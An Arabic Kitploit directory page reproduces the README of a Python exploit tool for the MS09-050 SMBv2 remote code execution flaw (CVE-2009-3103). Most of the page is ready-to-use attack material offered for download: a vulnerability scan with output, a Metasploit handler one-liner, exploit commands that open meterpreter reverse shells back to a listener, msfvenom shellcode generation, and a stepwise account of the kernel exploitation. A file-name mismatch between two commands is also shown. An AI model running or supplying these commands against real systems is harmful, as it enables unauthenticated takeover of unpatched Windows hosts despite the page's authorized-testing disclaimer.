Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
MS09-050 — استغلال Python لثغرة MS09-050 (CVE-2009-3103) تجاوز سعة المخزن المؤقت في SMBv2 srv2.sys، مع ماسح ضوئي للثغرات، واكتشاف تلقائي للمعمارية، وحمولات reverse shell لـ x86/x64. | Kitploit
أدوات/GitHubGitHub/bytejmp/ms09-050
ماسحات الثغرات الأمنيةتوليد الحمولةالاستغلالشيل كودجمع المعلوماتما بعد الاستغلالأمن الشبكاتاختبار الاختراقالفريق الأحمرأداة الوصول عن بعد
GitHubbytejmp/ms09-050

MS09-050

منذ 13س 56دلم تتم المراجعة بعد

استغلال Python لثغرة MS09-050 (CVE-2009-3103) تجاوز سعة المخزن المؤقت في SMBv2 srv2.sys، مع ماسح ضوئي للثغرات، واكتشاف تلقائي للمعمارية، وحمولات reverse shell لـ x86/x64.

عرض المستودع

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

MS09-050 — استغلال تنفيذ التعليمات البرمجية عن بُعد في SMBv2

CVE-2009-3103

الثغرة الأمنية

قدّم Windows Vista و Server 2008 بروتوكول SMBv2 مع برنامج تشغيل نواة جديد، srv2.sys. يفشل هذا البرنامج في التحقق من صحة حقل Process Id High في طلبات التفاوض الخاصة بـ SMB. من خلال إرسال قيمة مصممة خصيصًا في هذا الحقل، يتسبب المهاجم في قيام srv2.sys بالفهرسة داخل جدول مؤشرات الدوال بقيمة متحكَّم بها، مما يؤدي إلى إلغاء الإشارة إلى عنوان يوفره المهاجم.

النتيجة هي تنفيذ تعليمات برمجية عشوائية في سياق النواة، دون الحاجة إلى مصادقة. يحتاج المهاجم فقط إلى الوصول إلى المنفذ 445.

قامت Microsoft بترقيع هذه الثغرة في أكتوبر 2009 (KB975517). أي نظام Vista SP1/SP2 أو Server 2008 SP1 غير مُرقَّع يكون عرضة للثغرة.

الأنظمة المتأثرة

نظام التشغيل الهدفالمعمارية
Windows Vista SP1x86
Windows Vista SP2x86 / x64
Windows Server 2008 SP1x86 / x64
Windows Server 2008 SP1 (pre-R2)x64

الميزات

  • وحدة الفحص: تحدد بصمة نظام التشغيل الهدف ومعماريته عبر تفاوض SMB، وتُبلّغ عن حالة الثغرة
  • الكشف التلقائي عن المعمارية: تُغذّي وحدة الفحص معلومات المعمارية مباشرةً في الاستغلال، دون تخمين يدوي
  • الحمولة المدمجة: stager من نوع meterpreter/reverse_tcp لمعمارية x86، جاهز للاستخدام مع multi/handler
  • تكامل msfvenom: توليد أي حمولة لأي معمارية عبر msfvenom، مع خيار --msf-payload لاختيار حمولة مخصصة
  • دعم shellcode مخصص: تحميل أي ملف shellcode خام (-s)
  • مخرجات منظمة: [+] نجاح، [-] خطأ، [!] تحذير، [*] معلومات

التثبيت

root@kitploit:~
git clone https://github.com/bytejmp/MS09-050.git
cd MS09-050

المتطلبات:

  • Python 3.6+
  • rpcclient (من حزمة smbclient)، يُستخدم لتحفيز الحمولة بعد الحقن
  • msfvenom، مطلوب فقط عند استخدام خيار --msfvenom

على Debian/Ubuntu:

root@kitploit:~
sudo apt install smbclient

على Arch Linux:

root@kitploit:~
sudo pacman -S smbclient

الاستخدام

فحص هدف

root@kitploit:~
python3 MS09.py scan -t 192.168.1.10

المخرجات:

root@kitploit:~
[*] Scanning 192.168.1.10:445...
[+] Target 192.168.1.10 is reachable
[+] SMBv2 supported
[*] OS: Windows Vista (TM) Ultimate 6001 Service Pack 1
[*] Architecture: x86
[+] Target appears VULNERABLE to MS09-050

الاستغلال بحمولة مدمجة (x86)

يستخدم stager من نوع meterpreter/reverse_tcp. ابدأ الـ handler أولاً:

root@kitploit:~
msfconsole -q -x "use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set LHOST 10.0.0.5; set LPORT 4444; run"

ثم شغّل الاستغلال:

root@kitploit:~
python3 MS09.py exploit -t 192.168.1.10 --payload -l 10.0.0.5 -p 4444

الاستغلال باستخدام msfvenom (أي معمارية/حمولة)

root@kitploit:~
python3 MS09.py exploit -t 192.168.1.10 --msfvenom -l 10.0.0.5 -p 4444 -a x64

الاستغلال باستخدام msfvenom (حمولة مخصصة)

root@kitploit:~
python3 MS09.py exploit -t 192.168.1.10 --msfvenom --msf-payload windows/meterpreter/reverse_tcp -l 10.0.0.5 -p 4444

الاستغلال باستخدام ملف shellcode مخصص

ولّد shellcode خام مرة واحدة، وأعد استخدامه دون msfvenom:

root@kitploit:~
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.5 LPORT=4444 EXITFUNC=thread -f raw -o shell.bin

ثم مرّره إلى الاستغلال:

root@kitploit:~
python3 MS09.py exploit -t 192.168.1.10 -s shellcode.bin -a x86

المساعدة الكاملة

root@kitploit:~
$ python3 MS09.py -h

usage: MS09.py [-h] {scan,exploit} ...

MS09-050 SMBv2 Remote Code Execution Exploit (CVE-2009-3103)

positional arguments:
  {scan,exploit}  Operation mode
    scan          Scan target for MS09-050 vulnerability
    exploit       Send exploit to target

$ python3 MS09.py exploit -h

usage: MS09.py exploit [-h] -t TARGET [-P PORT] [-a {x86,x64}]
                        (--payload | --msfvenom | -s FILE)
                        [-l LHOST] [-p LPORT] [--msf-payload PAYLOAD]

options:
  -t, --target      Target IP address
  -P, --port        SMB port (default: 445)
  -a, --arch        Target architecture (auto-detected if omitted)
  --payload         Use built-in reverse shell payload (no Metasploit needed)
  --msfvenom        Generate shellcode with msfvenom
  --msf-payload     msfvenom payload (default: shell_reverse_tcp x86, x64/shell_reverse_tcp x64)
  -s, --shellcode   Path to raw shellcode file
  -l, --lhost       Listener IP address
  -p, --lport       Listener port

بنية المشروع

root@kitploit:~
MS09/
├── MS09.py              # Main entry point
├── README.md
└── lib/
    ├── __init__.py
    ├── output.py        # Standardized output formatting
    ├── scanner.py       # SMBv2 vulnerability scanner
    ├── payloads.py      # Built-in shellcode (reverse TCP shell)
    └── exploit.py       # Exploit buffer construction and delivery

كيف يعمل

  1. وحدة الفحص ترسل Negotiate Protocol Request من SMB1 لتحديد بصمة إصدار نظام التشغيل الهدف ومعماريته
  2. الاستغلال يصمم طلب تفاوض SMBv2 مشوّهًا يُفيض مخزنًا مؤقتًا في srv2.sys
  3. يُستخدم stager بخطاف sysenter للحصول على تنفيذ أولي للتعليمات البرمجية في سياق النواة
  4. ينتقل الـ stager إلى وضع المستخدم وينفّذ الـ shellcode المقدَّم (reverse shell)
  5. rpcclient يحفّز التعليمات البرمجية المحقونة عبر بدء محاولة مصادقة SMB

المراجع

  • CVE-2009-3103
  • Microsoft Security Bulletin MS09-050
  • SRV2.SYS SMBv2 Vulnerability Analysis

إخلاء المسؤولية

تُقدَّم هذه الأداة لأغراض اختبار الاختراق المصرَّح به والأغراض التعليمية فقط.

يُعدّ الوصول غير المصرَّح به إلى أنظمة الحاسوب جريمة جنائية في معظم الولايات القضائية. يجب عليك الحصول على إذن كتابي صريح من مالك النظام قبل استخدام هذه الأداة ضد أي هدف. لا يتحمل المؤلفون أي مسؤولية ولا يُسألون عن أي إساءة استخدام أو ضرر ناتج عن هذا البرنامج.

باستخدامك هذه الأداة، فإنك توافق على أن:

  • لديك تفويض كتابي لاختبار النظام الهدف
  • أنت تعمل ضمن نطاق تقييم أمني مشروع
  • تتحمل المسؤولية الكاملة عن أفعالك
  • سـتمتثل لجميع القوانين واللوائح المعمول بها

استخدمها بمسؤولية. اخترق بأخلاقية.

تنزيل الأداة